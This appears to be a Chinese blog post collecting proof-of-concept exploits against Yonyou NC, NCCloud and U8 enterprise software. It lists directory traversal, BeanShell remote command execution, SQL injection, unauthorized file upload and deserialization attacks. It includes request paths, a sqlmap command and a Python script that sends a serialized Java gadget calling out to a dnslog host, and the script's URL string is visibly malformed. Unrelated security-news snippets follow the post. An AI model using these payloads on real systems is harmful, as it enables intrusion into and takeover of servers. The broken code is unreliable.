渗透测试 | 用友各种漏洞整理

VSole2021-07-12 15:13:31

介绍:前段时间参加攻防演练的时候,发现目标系统有很多都使用了用友的产品,故整理一篇关于用友漏洞的文章。

0x01 用友ERP-NC目录遍历漏洞

1.1 漏洞描述

用友ERP-NC存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息

1.2 漏洞复现

poc

/NCFindWeb?service=IPreAlertConfigService&filename=

0x02 用友NC bsh.servlet.BshServlet远程命令执行漏洞

2.1 漏洞描述

用友NC bsh.servlet.BshServlet存在远程命令执行漏洞,通过BeanShell执行远程命令获取服务器权限。

2.2 漏洞复现

poc:

/servlet/~ic/bsh.servlet.BshServlet

0x03 用友NCCloud FS文件管理SQL注入

3.1 漏洞描述

用友NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入

3.2 漏洞复现

nccloud登录界面:

文件服务器管理登录页面:

http://xxx.xxx.xxx.xxx/fs/

抓取登录数据包:

GET /fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://xxx.xxx.xxx.xxx:xxxx/fs/
Cookie: JSESSIONID=1591C393D0A5D165A1D3FCBDE19E1426.server; JSESSIONID=923588EF04C38332C5E907DB6DCF1B00.server
Upgrade-Insecure-Requests: 1

sqlmap跑注入:

sqlmap -r 1.txt -p username

0x04 用友NC 6.5未授权文件上传漏洞

4.1 漏洞描述

用友NC6.5版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。

4.2 漏洞复现

nccloud登录页面:

设置本地代理:

zsh运行脚本:(脚本来源于tools,禁止利用于非法用途。)

python3 nc.py -u http://xxx.xxx.xxx.xxx:xxxx/

burp抓取本地数据包,黄色标记部分修改为上传的内容:

访问返回的链接:

0x05 用友NC XbrlPersistenceServlet反序列化

5.1 漏洞描述

已知用友NC6.5版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。

5.2 漏洞复现

(1)利用一

漏洞URL:

/service/~xbrl/XbrlPersistenceServlet

利用脚本:

import requests
import threadpool
import urllib3
import sys
import base64

ip = "x.x.x.x"
dnslog = "*****" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"

uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)

(2)利用二

usage

java -jar nc6.5.jar [target] [command]

0x06 用友U8 OA``SQL注入漏洞

6.1 漏洞描述

用友U8 OA test.jsp文件存在SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。

6.2 漏洞复现

登录界面:

poc:

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

整改方案

升级到最新版本,时刻关注官网的补丁。

作者:goout

关注公众号,后台回复 『0712-用友』,获取打包好的所有工具

渗透测试用友软件集团
本作品采用《CC 协议》,转载必须注明作者和本文链接
过去几周,联邦调查局、司法部 (DOJ)、国际刑警组织和其他国际执法机构共同努力逮捕和起诉勒索软件威胁行为者。通过这些努力,已追回数百万美元的赎金。谈到法治,人人享有司法公正和公平审判都是任何民主社会的基础。
要说哪个网络威胁组织同时具备狡猾的社会工程学能力和灵活的网络安全技术,那就不得不提到Muddled Libra了。由于对企业信息技术有着深入的了解,即使你的组织机构拥有完善的传统网络防御系统,Muddled Libra也会对你产生巨大的威胁。
2021 年 10 月 27 日,欧盟网络和信息安全局(ENISA)发布《ENISA 2021年威胁态势展望》报告,分析了全球面临的九大网络安全威胁,阐述了威胁趋势、威胁参与者和攻击技术等,提出了相关缓解和应对措施。2021 年该项工作得到了新组建的 ENISA 网络安全威胁态势 (CTL) 特设工作组的支持。该报告可帮助战略决策者和政策制定者、政府及公司详尽了解最新的网络安全威胁,而且可针对性地
Lookout Threat Lab的研究人员发现哈萨克斯坦政府在其境内使用企业级Android监控软件。我们于2022年4月首次检测到来自该活动的样本。根据意大利下议院在2021年发布的一份文件,意大利当局可能在反腐败行动中滥用了这个软件。该文件提到了iOS版本的Hermit,并将RCS Lab和Tykelab与恶意软件联系起来,这证实了我们的分析。
勒索软件已成为一种日益普遍的全球威胁,2021年上半年,在众多网络威胁中表现最为亮眼也最为疯狂。据SonicWall报告称,相比2020年上半年,2021上半年勒索软件攻击数量增长了151%。攻击规模和频率以惊人的速度增长,复杂性和创新水平不断提高,成为政府、企业、个人最为关注的安全风险之一,也是网络安全最重大威胁之一。因此,有必要从发生原因、发展特点、打击措施和防御建议等方面进行分析研究。
KCon 2021部分PPT发布
2021-11-09 07:32:15
今年是 KCon 10周年,疫情环境下线下会议举步维艰,原本计划在8月底进行的大会随后推迟到10月底。考虑到未到场听众的急切心情,我们决定提前对外发布 KCon 议题。这次披露的是QEMU中比较罕见的可控长度越界读写漏洞,可以稳定利用并进行虚拟机逃逸,本次是首次披露该模块的漏洞细节。本议题将介绍如何针对 CFI 的固有缺陷来突破其防御。
Osterman Research的一份调研报告指出,相较于子公司数量较少的企业,子公司数量众多的跨国企业更容易受到网络安全威胁,且更难以管理风险。
本研究的系统分析揭示了一系列漏洞,这些漏洞证明了 EVCSMS 对远程网络攻击的不安全性。考虑到此类攻击的可行性,还讨论了针对 EV 充电站 (EVCS,EV Charging Stations) 及其用户的攻击影响。
在2017年,网络攻击者在一个金融软件包中植入了NotPetya恶意蠕虫。当很多企业更新他们的软件时,就会被感染。NotPetya蠕虫病毒因此迅速传播,并为全球各地的企业带来数十亿美元的损失。美国政府称其为“史上最具破坏性和代价最高的网络攻击”。 在三年后,网络攻击者侵入了SolarWinds公司的Orion网络监控工具集的软件升级过程。其带来的破坏性也是十分广泛的。
VSole
网络安全专家